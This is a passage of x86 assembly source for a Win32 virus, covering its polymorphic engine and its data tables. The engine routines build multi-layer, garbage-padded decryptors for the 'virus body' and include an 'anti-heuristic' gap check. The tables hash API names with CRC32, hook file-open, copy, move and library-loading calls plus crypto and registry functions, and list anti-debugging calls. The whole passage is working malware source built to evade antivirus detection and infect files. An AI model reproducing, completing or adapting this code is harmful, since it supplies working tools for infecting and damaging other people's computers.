		call	__copro_fix_delta

		;  go back
		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ generate layer pointer ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function generates pointer to a layers memory map.
		;
		;
		__pglp_old_val	dd	00000000h	;old random value
		__pglp_ov_where dd	00000000h	;pointer to update
		;
ppe_get_layer_pointer:

		; save all registers
		pusha

		; generate random pointer for layers map
		call	gen_garbage
		call	ppe_get_rnd32
		mov	[ebp+__pglp_old_val],eax
		mov	bl,[ebp+mlayer_reg]
		call	ppe_crypt_value
		mov	al,[ebp+mlayer_reg]
		call	__reg_to_bcd
		or	[ebp+used_regs],ah
		or	al,0C0h 		;ADD instruction
		mov	ah,81h
		xchg	ah,al
		stosw
		mov	[ebp+__pglp_ov_where],edi
		stosd
		mov	al,03h			;ADD instruction
		mov	ah,byte ptr [ebp+mlayer_reg]
		shl	ah,3
		or	ah,byte ptr [ebp+gl_index_reg]
		or	ah,0C0h
		stosw
		call	gen_garbage

		; restore registers
		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ function to build brute-multi-layer-poly decoder ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function generates the very perfect decryptor.
		;Scheme:
		;
		;  @@1:  ROR   code_reg, 01h
		;	 (ADD,SUB,XOR) [index_reg], code_reg
		;	 DEC   index_reg
		;	 TEST  [mlayer_reg], 80h
		;	 JNZ   @@2
		;	 INC   index_reg
		;	 INC   index_reg
		;  @@2:  DEC   byte ptr [mlayer_reg]
		;	 TEST  [mlayer_reg], 7Fh
		;	 JNZ   @@1
		;	 TEST  BYTE PTR [mlayer_reg],80h
		;	 JNZ   @@3
		;	 TEST  BYTE PTR [mlayer_reg+1],80H
		;	 JZ    @@4
		;	 DEC   index_reg
		;	 JMP   @@4
		;  @@3:  TEST  BYTE PTR [mlayer_reg+1],80H
		;	 JNZ   @@4
		;	 INC   index_reg
		;  @@4:
		;
		;And it is whole decryptor, very easy to understand... :)
		;
ppe_decoder:

		; save all registers
		pusha

		; build sado-maso decoder :)
		push	edi			;"go back" offset
		mov	[ebp+decoder_back],edi
		call	gen_garbage

		; rotate by code_reg
		mov	ax,0C8D1h		;ROR code_reg, 01h
		or	ah,[ebp+code_reg]
		stosw
		call	gen_garbage

		; select type of coding (ADD, SUB, XOR) ?
		mov	al,00h			;ADD instruction
		cmp	byte ptr [ebp+crypt_style],02h
		jz	__pd_xor
		cmp	byte ptr [ebp+crypt_style],01h
		jnz	__pd_select_regs
		mov	al,28h			;SUB instruction
		jmp	__pd_select_regs
	__pd_xor:
		mov	al,30h			;XOR instruction
	__pd_select_regs:
		mov	ah,[ebp+code_reg]	;code register
		shl	ah,03h
		or	ah,[ebp+index_reg]	;index register
		stosw
		call	gen_garbage

		; change index register
		mov	al,48h			;DEC instruction
		or	al,[ebp+index_reg]	;index register
		stosb
		call	gen_garbage

		; move down or up ? (+/-) flag
		mov	ax,00F6h		;TEST byte [mlayer_reg],80h
		or	ah,[ebp+mlayer_reg]
		stosw
		mov	al,80h			;test last byte
		stosb
		call	gen_garbage_no_flags

		; build JNZ conditional jump (jump if DOWN)
		mov	ax,850Fh		;JNZ instruction
		stosw
		push	edi
		stosd				;do place
		call	gen_garbage
		mov	al,40h			;INC index register
		or	al,[ebp+index_reg]
		stosb
		call	gen_garbage
		stosb
		call	gen_garbage
		pop	ebx			;JNZ offset
		call	gen_garbage
		mov	eax,edi 		;build JNZ offset
		sub	eax,ebx
		sub	eax,4
		mov	[ebx],eax

		; decrease number of movements in layer buffer
		mov	ax,08FEh		;DEC byte ptr [---]
		or	ah,[ebp+mlayer_reg]
		stosw
		call	gen_garbage

		; test whether it was last coding, if yes, next movement
		mov	ax,00F6h		;TEST byte [mlayer_reg],7Fh
		or	ah,[ebp+mlayer_reg]
		stosw
		mov	al,7Fh			;test "x0000000b" status
		stosb
		call	gen_garbage_no_flags

		; build next conditional JNZ jump
		mov	ax,850Fh		;JNZ instruction
		stosw
		pop	eax
		sub	eax,edi
		sub	eax,4
		stosd
		call	gen_garbage

		; generate a lot of TEST instructions and JNZ/JZ cond. jumps
		mov	ax,00F6h		;TEST byte [mlayer_reg],80h
		or	ah,[ebp+mlayer_reg]
		stosw
		mov	al,80h
		stosb
		call	gen_garbage_no_flags
		mov	ax,850Fh		;JNZ instruction
		stosw
		push	edi
		stosd				;update later
		call	gen_garbage
		mov	ax,40F6h		;TEST byte [mlayer_reg+1],80h
		or	ah,[ebp+mlayer_reg]
		stosw
		mov	ax,8001h
		stosw
		call	gen_garbage_no_flags
		mov	ax,840Fh		;JZ instruction
		stosw
		push	edi
		stosd
		call	gen_garbage
		mov	al,48h			;DEC instruction
		or	al,[ebp+index_reg]
		stosb
		call	gen_garbage
		mov	al,0E9h 		;JMP instruction
		stosb
		push	edi
		stosd
		call	gen_garbage
		mov	ebx,[esp+00000008h]	;@@3 update address
		mov	eax,edi
		sub	eax,ebx
		sub	eax,00000004h
		mov	[ebx],eax
		mov	ax,40F6h		;TEST byte [mlayer_reg+1],80h
		or	ah,[ebp+mlayer_reg]
		stosw
		mov	ax,8001h
		stosw
		call	gen_garbage_no_flags
		mov	ax,850Fh		;JNZ instruction
		stosw
		mov	[esp+00000008h],edi
		stosd
		call	gen_garbage
		mov	al,40h			;INC instruction
		or	al,[ebp+index_reg]
		stosb
		call	gen_garbage
		mov	ecx,00000003h
	__pd_update_cjumps:
		pop	ebx			;get @@4 conditional jump
		mov	eax,edi
		sub	eax,ebx
		sub	eax,00000004h
		mov	[ebx],eax
		loop	__pd_update_cjumps

		; restore all registers
		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ generate next code value ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function updates code value by code_value_add.
		;

ppe_get_next_code:

		; save all registers
		pusha

		; calculate next code value
		mov	ax,0C081h		;ADD code_reg,code_value_add
		or	ah,[ebp+code_reg]
		stosw
		mov	eax,[ebp+code_value_add]
		stosd
		call	gen_garbage

		; restore all registers
		mov	[esp],edi		;update EDI through POPA
		popa
		ret

;ÄÄÄ´ function to check multi-layers gaps ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function checks whether pointer is in gap (anti-heu-
		;stistic). If it's on that place then i'll change pointer.
		;
		__pgnlp_old	dd	8 dup(0,0)	;old random numbers
		;
ppe_get_next_layer_pointer:

		; save all registers
		pusha

		; increase multi-layer pointer
		call	gen_garbage
		mov	al,40h			;INC instruction
		or	al,[ebp+mlayer_reg]
		stosb
		call	gen_garbage

		; generate some random numbers
		mov	ecx,[ebp+__pglg_num]	;number of gaps
		or	ecx,ecx 		;no gaps ?
		jz	__pgnlp_finish
	__pgnlp_get_nums:
		call	ppe_get_empty_reg
		mov	bl,al			;empty reg to BL
		call	ppe_get_rnd32
		mov	[ebp+__pgnlp_old+ecx*8-8],eax
		call	ppe_crypt_value
		mov	ax,0C081h		;ADD instruction
		or	ah,bl
		stosw
		mov	[ebp+__pgnlp_old+ecx*8-4],edi ;save pos.
		stosd
		mov	al,03h			;ADD instruction
		mov	ah,bl
		shl	ah,3
		or	ah,byte ptr [ebp+gl_index_reg]
		or	ah,0C0h
		stosw
		mov	ax,0C03Bh		;CMP instruction
		shl	bl,3			;empty reg << 3
		or	ah,bl
		or	ah,[ebp+mlayer_reg]
		stosw
		call	gen_garbage_no_flags
		mov	ax,850Fh		;JNZ conditional jump
		stosw
		push	edi
		stosd
		call	gen_garbage
		mov	ax,0C081h		;ADD instruction
		or	ah,[ebp+mlayer_reg]
		stosw
		mov	eax,[ebp+__pglg_num]	;number of gaps
		sub	eax,ecx
		mov	eax,[ebp+__pglg_where+eax*8+4]
		stosd
		call	gen_garbage
		pop	eax
		mov	ebx,edi 		;calculate JNZ offset
		sub	ebx,eax
		sub	ebx,4
		mov	[eax],ebx
		dec	ecx
		jnz	__pgnlp_get_nums
		call	gen_garbage

	__pgnlp_finish:
		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ function to generate decoder-loop ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function generates last JNZ jump to the start of de-
		;coder loop.
		;
		__pge_where	dd	00000000h	;place to update
		;
ppe_get_exloop:

		; save all registers
		pusha

		; build main compare instruction
		call	gen_garbage
		call	ppe_get_empty_reg
		call	__reg_to_bcd
		or	[ebp+used_regs],ah
		mov	bl,al
		mov	eax,[ebp+__mlg_size]	;size of the layers buf
		call	ppe_crypt_value
		call	gen_garbage
		mov	ah,bl			;dest reg
		shl	ah,03h
		or	ah,[ebp+gl_index_reg]
		or	ah,0C0h
		mov	al,03h			;ADD
		stosw
		call	gen_garbage
		mov	ax,0C081h		;ADD
		or	ah,bl
		stosw
		mov	[ebp+__pge_where],edi
		stosd
		call	gen_garbage
		mov	ah,bl
		shl	ah,03h
		or	ah,[ebp+mlayer_reg]
		or	ah,0C0h
		mov	al,3Bh			;CMP instruction
		stosw
		mov	al,bl
		call	__reg_to_bcd
		not	ax
		and	[ebp+used_regs],ah	;disbale register
		call	gen_garbage_no_flags
		mov	ax,850Fh		;JNZ instruction
		stosw
		mov	eax,[ebp+decoder_back]	;build JNZ offset
		sub	eax,edi
		sub	eax,4
		stosd
		call	gen_garbage

		; restore all registers
		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ function to jump to 3rd decoding loop ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function checks whether virus body has been decrypt-
		;ed by multi-layers engine and then jumps to the 3rd deco-
		;ding loop to finish that work :).
		;
ppe_get_return:

		; save all registers
		pusha

		; save used-regs
		movzx	eax,byte ptr [ebp+gl_index_reg]
		call	__reg_to_bcd
		mov	[ebp+used_regs],ah

		; generate offset to jump back
		call	gen_garbage
		xor	eax,eax
		mov	ebx,[ebp+file_size3]
		sub	ebx,eax
		push	ebx

		; ready to JMP there
		call	ppe_get_empty_reg
		pop	eax
		dec	eax
		not	eax
		call	c_call_reg32		;edi-2 = call reg32 instr
		mov	eax,[ebp+g_cr32_jump]
		add	byte ptr [eax-1],10h	;CALL reg32 --> JMP reg32

		; generate final garbages
		mov	eax,00000005h
		call	ppe_get_rnd_range
		add	eax,00000005h
		mov	ecx,eax
	__pgr_final:
		call	gen_garbage
		loop	__pgr_final

		; restore all registers
		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ function to create multi-layer buffer ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function builds multi-layers buffer behind our poly-
		;morphic code.
		;
ppe_get_mlayer_buffer:

		; save all registers
		pusha

		; copy buffer from memory to EDI
		push	edi			;start of memory layer buf
		mov	esi,[ebp+__mlg_map]	;layers in memory
		mov	ecx,[ebp+__mlg_size]	;size of the buffer
		rep	movsb

		; generate some last garbages
		mov	eax,00000005h
		call	ppe_get_rnd_range
		add	eax,00000005h
	__pgmb_generate:
		call	gen_garbage
		dec	eax
		jnz	__pgmb_generate

		; update multi-layer pointer in "ppe_get_layer_pointer"
		pop	ebx			;start of mem layers buffers
		sub	ebx,[ebp+poly_start]	;EAX - poly_start = pos
		mov	eax,ebx
		sub	eax,[ebp+__pglp_old_val]
		mov	edx,[ebp+__pglp_ov_where]
		mov	[edx],eax

		; update multi-layer pointer in "ppe_get_exloop"
		mov	edx,[ebp+__pge_where]
		mov	[edx],ebx

		; update multi-layer pointers in "ppe_get_next_layer_pointer"
		mov	esi,[ebp+__pglg_num]
		xor	ecx,ecx
		or	esi,esi 		;no gaps ?
		jz	__pgmb_finish
	__pgmb_next_change:
		inc	ecx
		mov	eax,ebx
		add	eax,[ebp+__pglg_where+ecx*8-8];where is the gap
		sub	eax,[ebp+__pgnlp_old+esi*8-8] ;get random number
		mov	edx,[ebp+__pgnlp_old+esi*8-4] ;position
		mov	[edx],eax
		dec	esi
		cmp	[ebp+__pglg_num],ecx
		jnz	__pgmb_next_change

		; restore all registers
	__pgmb_finish:
		mov	[esp],edi
		popa
		ret

;ÄÄÄ´ function for write insignificant data ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

ppe_gen_rnd_block:
		mov	eax,00000014h
		call	ppe_get_rnd_range
		add	eax,00000005h
		mov	ecx,eax

ppe_gen_rnd_fill:
		cld
		movzx	eax,byte ptr [ebp+compare_index]
		cmp	eax,00000005h
		jae	ppe_gen_rnd_loop
		push	ebx
		mov	ebx,eax
		mov	eax,ecx
		sub	eax,00000004h		;far JMP's five bytes - 1
		call	ppe_get_rnd_range
		add	eax,edi
		sub	eax,[ebp+poly_start]
		mov	[ebp+compare_buffer+ebx*04h],eax
		inc	byte ptr [ebp+compare_index]
		pop	ebx
ppe_gen_rnd_loop:
		call	ppe_get_rnd32
		stosb
		loop	ppe_gen_rnd_loop
		ret

;ÄÄÄ´ functions returns (empty) base reg ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

ppe_get_reg:	mov	eax,00000008h
		call	ppe_get_rnd_range
		lea	ebx,dword ptr [ebp+tbl_regs+eax*02h]
		ret

ppe_get_empty_reg:
		call	ppe_get_reg
		test	byte ptr [ebx+REG_FLAGS],REG_IS_STACK
		jnz	ppe_get_empty_reg
		call	__reg_to_bcd
		test	[ebp+used_regs],ah
		jnz	ppe_get_empty_reg
		movzx	ax,al
		ret

	__reg_to_bcd:
		push	ebx
		movzx	ebx,al
		movzx	ebx,byte ptr [ebp+tbl_regs_bcd+ebx]
		mov	ah,bl
		pop	ebx
		ret

;ÄÄÄ´ random numbers ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

ppe_get_rnd32:
		push	ebx ecx edx		;my special algorithm to
		mov	eax,[ebp+poly_seed]	;calculate a random number
		mov	ecx,41C64E6Dh		;for Win32
		mul	ecx
		xchg	eax,ecx
		call	[ebp+ddGetTickCount]
		mov	ebx,eax
		db	0Fh, 31h		;RDTCS instruction - read
		xor	eax,ebx
		xchg	ecx,eax 		;PCs ticks to EDX:EAX
		mul	ecx
		add	eax,00003039h
		mov	[ebp+poly_seed],eax
		pop	edx ecx ebx
		ret

ppe_get_rnd_range:
		push	ecx edx
		mov	ecx,eax
		call	ppe_get_rnd32
		xor	edx,edx
		div	ecx
		mov	eax,edx
		pop	edx ecx
		ret

;ÄÄÄ´ polymorphic tables (PPE-II) ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		; some equ's needed by Prizzy Polymorphic Engine (PPE-II)

REG_NO_8BIT	equ	1			;esi,edi,ebp aren't 8bit
REG_IS_STACK	equ	2			;reg is stack because of copro
REG_FLAGS	equ	1			;one byte to set tbl_regs' flags
USED_MEMORY	equ	30			;we must be far then 30 bytes in poly
USED_BASED	equ	1			;don't generate copro
USED_FLAGS	equ	2			;generated garbages can't modify flags

		; table of registers
		; DO NOT modify this table or the next because they're
		; dependent on - because of tranfer to reg_bcd

tbl_regs	equ	this byte
		db	00000000b,00h		;eax
		db	00000001b,00h		;ecx
		db	00000010b,00h		;edx
		db	00000011b,00h		;ebx
		db	00000100b,REG_IS_STACK	;esp
		db	00000101b,REG_NO_8BIT	;ebp
		db	00000110b,REG_NO_8BIT	;esi
		db	00000111b,REG_NO_8BIT	;edi
end_regs	equ	this byte

		; table for use registers, DO NOT modify or move

tbl_regs_bcd	equ	this byte
		db	00000001b		;eax, st(0)
		db	00000010b		;ecx, st(1)
		db	00000100b		;edx, st(2)
		db	00001000b		;ebx, st(3)
		db	00010000b		;esp, st(4)
		db	00100000b		;ebp, st(5)
		db	01000000b		;esi, st(4)
		db	10000000b		;edi, st(7)
end_regs_bcd	equ	this byte

		; opcodes for math reg,imm

tbl_math_imm	equ	this byte
		db	0C0h			;add
		db	0C8h			;or
		db	0E0h			;and
		db	0E8h			;sub
		db	0F0h			;xor
		db	0D0h			;adc
		db	0D8h			;sbb
end_math_imm	equ	this byte

		; opcodes for math reg,reg

tbl_math_reg	equ	this byte
		db	03h			;add
		db	0Bh			;or
		db	13h			;adc
		db	1Bh			;sbb
		db	23h			;and
		db	2Bh			;sub
		db	33h			;xor
end_math_reg	equ	this byte

		; one byte instructions that doesn't modify reg

tbl_save_code	equ	this byte
		clc
		stc
		cmc
		cld
		std
end_save_code	equ	this byte

		; opcodes for rotate/shift reg,imm

tbl_rs_imm	equ	this byte
		db	0C0h			;rol
		db	0C8h			;ror
		db	0D0h			;rcl
		db	0D8h			;rcr
		db	0E0h			;shl
		db	0E8h			;shr
		db	0F8h			;sar
end_rs_imm	equ	this byte

		; opcodes for bit tests reg,imm

tbl_bt_imm	equ	this byte
		db	0E0h, 0E8h, 0F0h, 0F8h	;bt, bts, btr, btc
end_bt_imm	equ	this byte

		; opcodes for bit tests reg,reg

tbl_bt_reg	equ	this byte
		db	0A3h, 0ABh, 0B3h, 0BBh	;bt, bts, btr btc
end_bt_reg	equ	this byte

		; opcodes for generate defined number
		; decode_instruction = encode_instruction + 1st_number
		; reg32 = 2nd_number + defined_reg32
		; immX	= 3rd_number * 8

tbl_num_code	equ	this byte
		db	003h,081h,0C0h,04h	;add (reg32), imm32
		db	0FBh,081h,0E8h,04h	;sub (reg32), imm32
		db	0FFh,081h,0F0h,04h	;xor (reg32), imm32
		db	003h,0C1h,0C0h,01h	;rol (reg32), imm8
		db	0FBh,0C1h,0C8h,01h	;ror (reg32), imm8
		db	0FFh,0F7h,0D0h,00h	;not (reg32)
end_num_code	equ	this byte

		; table of rep/repnz operations

tbl_repeat	equ	this byte
		dd	offset __gr_cmps	;compare mem operand
		dd	offset __gr_lods	;load mem operand
		dd	offset __gr_stos	;store mem data
		dd	offset __gr_scas	;scan mem
		dd	offset __gr_movs	;move data from mem to mem
end_repeat	equ	this byte

		; table of the second encode-loop
		; the first  value means - count
		; the second value means - random select ?
		; the third  value means - already generated ?

tbl_encode_loop equ	this byte
		db	05h, 01h
		dd	00000000h, offset ppe_lloop_generate
		dd	00000000h, offset ppe_mlayer_generate
		dd	00000000h, offset ppe_brute_init
		dd	00000000h, offset ppe_get_delta
		dd	00000000h, offset ppe_get_layer_gaps
		db	02h, 00h
		dd	00000000h, offset ppe_get_index
		dd	00000000h, offset ppe_get_layer_pointer
		db	01h, 01h
		dd	00000000h, offset ppe_decoder
		db	02h, 00h
		dd	00000000h, offset ppe_get_next_code
		dd	00000000h, offset ppe_get_next_layer_pointer
		db	03h, 01h
		dd	00000000h, offset ppe_get_exloop
		dd	00000000h, offset ppe_get_return
		dd	00000000h, offset ppe_get_mlayer_buffer
end_encode_loop equ	this byte

		; table of the instructions which they don't modify flags
		; 1st value = move to original instructions
		; 2nd value = how many garbages don't modify flags

tbl_no_flags	equ	this byte
		db	06h, (__no_flags_1 - tbl_garbage) / 04h
		db	06h, (__no_flags_2 - tbl_garbage) / 04h
end_no_flags	equ	this byte

		; hyper table of garbages (support only copro)
		; where __no_flags_X means the following garbages don't
		; modify any flags, do NOT modify this table 'cause of flags

tbl_garbage	equ	this byte
		dd	offset g_push_g_pop	;push reg/garbage/pop reg
   __no_flags_1:dd	offset g_movreg32imm	;mov reg32,imm
		dd	offset g_movreg16imm	;mov reg16,imm
		dd	offset g_movreg8imm	;mov reg8,imm
		dd	offset g_movregreg32	;mov reg32,reg32
		dd	offset g_movregreg16	;mov reg16,reg16
		dd	offset g_movregreg8	;mov reg8,reg8
		dd	offset g_mathreg32imm	;math reg32,imm
		dd	offset g_mathreg16imm	;math reg16,imm
		dd	offset g_mathreg8imm	;math reg8,imm
   __no_flags_2:dd	offset g_call_cont	;call/garbage/pop
		dd	offset g_jump_u 	;jump/rnd data
		dd	offset g_jump_c 	;jump conditional/garbage
		dd	offset g_movzx_movsx_32 ;movzx/movsx reg32,reg16
		dd	offset g_movzx_movsx_16 ;movzx/movsx reg16,reg8
		dd	offset g_movzx_movsx_8	;movzx/movsx reg32,reg8
		dd	offset g_rotate_shift32 ;(rcr,sal...) reg32,imm8
		dd	offset g_rotate_shift16 ;(ror,shl...) reg16,imm8
		dd	offset g_rotate_shift8	;(rol,shr...) reg8,imm8
		dd	offset g_rs_reg32reg8	;(rcr,sal...) reg32,reg8
		dd	offset g_rs_reg16reg8	;(ror,shl...) reg16,reg8
		dd	offset g_rs_reg8reg8	;(rol,shr...) reg8,reg8
		dd	offset g_bit_test32	;(bsf,bsr...) reg32,imm8
		dd	offset g_bit_test16	;(btc,bts...) reg16,imm8
		dd	offset g_bt_regreg32	;(bsf,bsr...) reg32,reg32
		dd	offset g_bt_regreg16	;(btc,bts...) reg16,reg16
		dd	offset g_mathregreg32	;(add,sub...) reg32,reg32
		dd	offset g_mathregreg16	;(xor,and...) reg16,reg16
		dd	offset g_mathregreg8	;(sbb,adc...) reg8,reg8
		dd	offset g_set_byte	;(seta,setp.) reg8
		dd	offset g_loop		;garbage/(loope/loopnz...)
		dd	offset g_loop_jump	;garbage/(dec reg8/16/32, jnz)
		dd	offset g_call_reg32	;gen reg32/call reg32/rndblock/pop reg32
		dd	offset g_jump_reg32	;gen reg32/jump reg32/rndblock
		dd	offset g_repeat 	;gen regz/rep(lods,cmps...)
		dd	offset g_pushpop_value	;push rnd(32/16)/garbage/pop reg32
		dd	offset g_crypt_value	;crypt rnd32 value to reg32
		dd	offset g_compare	;dec reg32/cmp r32,r32/jnz
end_garbage	equ	this byte

__garbage_based_num	equ	(offset end_garbage - offset tbl_garbage) / 04h

;ÄÄÄ´ some valuez needed by virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

			; kernel32's base address & its functions
kernel_base		dd	00000000h	;thx to z0mbie & Vecna
user32_base		dd	00000000h	;used in "kernel memory"
advapi_base		dd	00000000h

			; my big APIs table, using three libraries

	FunctionAddresses:
ddGetProcAddress	dd	00000000h	;standard functions
ddGetModuleHandleA	dd	00000000h
ddGetDriveTypeA 	dd	00000000h
ddFindFirstFileA	dd	00000000h	;FindFIles functions
ddFindNextFileA 	dd	00000000h
ddFindClose		dd	00000000h
ddReadFile		dd	00000000h	;FileHandle functions
ddWriteFile		dd	00000000h
ddSetFilePointer	dd	00000000h
ddSetEndOfFile		dd	00000000h
ddCloseHandle		dd	00000000h
ddDeleteFileA		dd	00000000h
ddSetFileAttributesA	dd	00000000h
ddCreateFileMappingA	dd	00000000h	;memory-mapped functions
ddMapViewOfFile 	dd	00000000h
ddUnmapViewOfFile	dd	00000000h
ddGetTempPathA		dd	00000000h	;get windows information
ddGetTempFileNameA	dd	00000000h
ddGetSystemDirectoryA	dd	00000000h
ddGetWindowsDirectoryA	dd	00000000h
ddWritePrivatePFStringA dd	00000000h
ddGetModuleFileNameA	dd	00000000h
ddGetVersion		dd	00000000h
ddGetStartupInfoA	dd	00000000h	;process information
ddWaitForSingleObject	dd	00000000h
ddCreateProcessA	dd	00000000h
ddOpenProcess		dd	00000000h
ddGetCurrentProcessId	dd	00000000h
ddCreateMutexA		dd	00000000h
ddReleaseMutex		dd	00000000h
ddSleep 		dd	00000000h
ddTerminateProcess	dd	00000000h
ddGetSystemTime 	dd	00000000h	;date & time functions
ddGetTickCount		dd	00000000h
ddGetFileSize		dd	00000000h
ddGetFileTime		dd	00000000h
ddSetFileTime		dd	00000000h
ddFileTimeToSystemTime	dd	00000000h
ddSystemTimeToFileTime	dd	00000000h
ddIsDebuggerPresent	dd	00000000h	;anti-debugging & anti-emul
ddCreateThread		dd	00000000h
ddWideCharToMultiByte	dd	00000000h	;stringz, characterz
ddlstrcat		dd	00000000h
ddlstrlen		dd	00000000h
ddIsBadCodePtr		dd	00000000h
ddGetLastError		dd	00000000h
	HookedAddresses:
ddCreateFileW		dd	00000000h	;opening files APIs
ddCreateFileA		dd	00000000h
ddOpenFile		dd	00000000h
dd_lopen		dd	00000000h
ddCopyFileW		dd	00000000h	;Copy/Move files APIs
ddCopyFileA		dd	00000000h
ddMoveFileW		dd	00000000h
ddMoveFileA		dd	00000000h
ddMoveFileExW		dd	00000000h
ddMoveFileExA		dd	00000000h
ddLoadLibraryW		dd	00000000h	;opening libraries APIs
ddLoadLibraryA		dd	00000000h
ddLoadLibraryExW	dd	00000000h
ddLoadLibraryExA	dd	00000000h
ddFreeLibrary		dd	00000000h

			; functions from ADVAPI32.DLL library
	HookedAddresses_advapi32:
ddCryptAcquireContextA	dd	00000000h	;Cryptography functions
ddCryptExportKey	dd	00000000h
ddCryptImportKey	dd	00000000h
ddCryptGetUserKey	dd	00000000h
ddCryptGetProvParam	dd	00000000h
ddCryptGenKey		dd	00000000h
ddCryptEncrypt		dd	00000000h
ddCryptDecrypt		dd	00000000h
ddCryptDestroyKey	dd	00000000h
ddCryptReleaseContext	dd	00000000h
ddRegOpenKeyExA 	dd	00000000h	;Registry functions
ddRegQueryValueExA	dd	00000000h
ddRegQueryInfoKeyA	dd	00000000h
ddRegEnumValueA 	dd	00000000h
ddRegSetValueExA	dd	00000000h
ddRegCreateKeyExA	dd	00000000h
ddRegCloseKey		dd	00000000h

			; functions from USER32.DLL library
	HookedAddresses_user32:
ddSetTimer		dd	00000000h
ddKillTimer		dd	00000000h
ddFindWindowA		dd	00000000h
ddPostMessageA		dd	00000000h
ddCharUpperBuffA	dd	00000000h


	FunctionNames:
szGetProcAddress:	__macro_CRC32 <GetProcAddress>
szGetModuleHandleA:	__macro_CRC32 <GetModuleHandleA>
szGetDriveTypeA:	__macro_CRC32 <GetDriveTypeA>
szFindFirstFileA:	__macro_CRC32 <FindFirstFileA>
szFindNextFileA:	__macro_CRC32 <FindNextFileA>
szFindClose:		__macro_CRC32 <FindClose>
szReadFile:		__macro_CRC32 <ReadFile>
szWriteFile:		__macro_CRC32 <WriteFile>
szSetFilePointer:	__macro_CRC32 <SetFilePointer>
szSetEndOfFile: 	__macro_CRC32 <SetEndOfFile>
szCloseHandle:		__macro_CRC32 <CloseHandle>
szDeleteFileA:		__macro_CRC32 <DeleteFileA>
szSetFileAttributesA:	__macro_CRC32 <SetFileAttributesA>
szCreateFileMappingA:	__macro_CRC32 <CreateFileMappingA>
szMapViewOfFile:	__macro_CRC32 <MapViewOfFile>
szUnmapViewOfFile:	__macro_CRC32 <UnmapViewOfFile>
szGetTempPathA: 	__macro_CRC32 <GetTempPathA>
szGetTempFileName:	__macro_CRC32 <GetTempFileNameA>
szGetSystemDirectoryA:	__macro_CRC32 <GetSystemDirectoryA>
szGetWindowsDirectoryA: __macro_CRC32 <GetWindowsDirectoryA>
szWritePrivatePFStringA:__macro_CRC32 <WritePrivateProfileStringA>
szGetModuleFileNameA:	__macro_CRC32 <GetModuleFileNameA>
szGetVersion:		__macro_CRC32 <GetVersion>
szGetStartupInfoA:	__macro_CRC32 <GetStartupInfoA>
szWaitForSingleObject:	__macro_CRC32 <WaitForSingleObject>
szCreateProcessA:	__macro_CRC32 <CreateProcessA>
szOpenProcess:		__macro_CRC32 <OpenProcess>
szGetCurrentProcessId:	__macro_CRC32 <GetCurrentProcessId>
szCreateMutexA: 	__macro_CRC32 <CreateMutexA>
szReleaseMutex: 	__macro_CRC32 <ReleaseMutex>
szSleep:		__macro_CRC32 <Sleep>
szTerminateProcess:	__macro_CRC32 <TerminateProcess>
szGetSystemTime:	__macro_CRC32 <GetSystemTime>
szGetTickCount: 	__macro_CRC32 <GetTickCount>
szGetFileSize:		__macro_CRC32 <GetFileSize>
szGetFileTime:		__macro_CRC32 <GetFileTime>
szSetFileTime:		__macro_CRC32 <SetFileTime>
szFileTimeToSystemTime: __macro_CRC32 <FileTimeToSystemTime>
szSystemTimeToFileTime: __macro_CRC32 <SystemTimeToFileTime>
szIsDebuggerPresent:	__macro_CRC32 <IsDebuggerPresent>
szCreateThread: 	__macro_CRC32 <CreateThread>
szWideCharToMultiByte:	__macro_CRC32 <WideCharToMultiByte>
szlstrcat:		__macro_CRC32 <lstrcat>
szlstrlen:		__macro_CRC32 <lstrlen>
szIsBadCodePtr: 	__macro_CRC32 <IsBadCodePtr>
szGetLastError: 	__macro_CRC32 <GetLastError>
	Hooked_API:
szCreateFileW:		__macro_CRC32 <CreateFileW>
szCreateFileA:		__macro_CRC32 <CreateFileA>
szOpenFile:		__macro_CRC32 <OpenFile>
sz_lopen:		__macro_CRC32 <_lopen>
szCopyFileW:		__macro_CRC32 <CopyFileW>
szCopyFileA:		__macro_CRC32 <CopyFileA>
szMoveFIleW:		__macro_CRC32 <MoveFileW>
szMoveFileA:		__macro_CRC32 <MoveFileA>
szMoveFileExW:		__macro_CRC32 <MoveFileExW>
szMoveFileExA:		__macro_CRC32 <MoveFileExA>
szLoadLibraryW: 	__macro_CRC32 <LoadLibraryW>
szLoadLibraryA: 	__macro_CRC32 <LoadLibraryA>
szLoadLibraryExW:	__macro_CRC32 <LoadLibraryExW>
szLoadLibraryExA:	__macro_CRC32 <LoadLibraryExA>
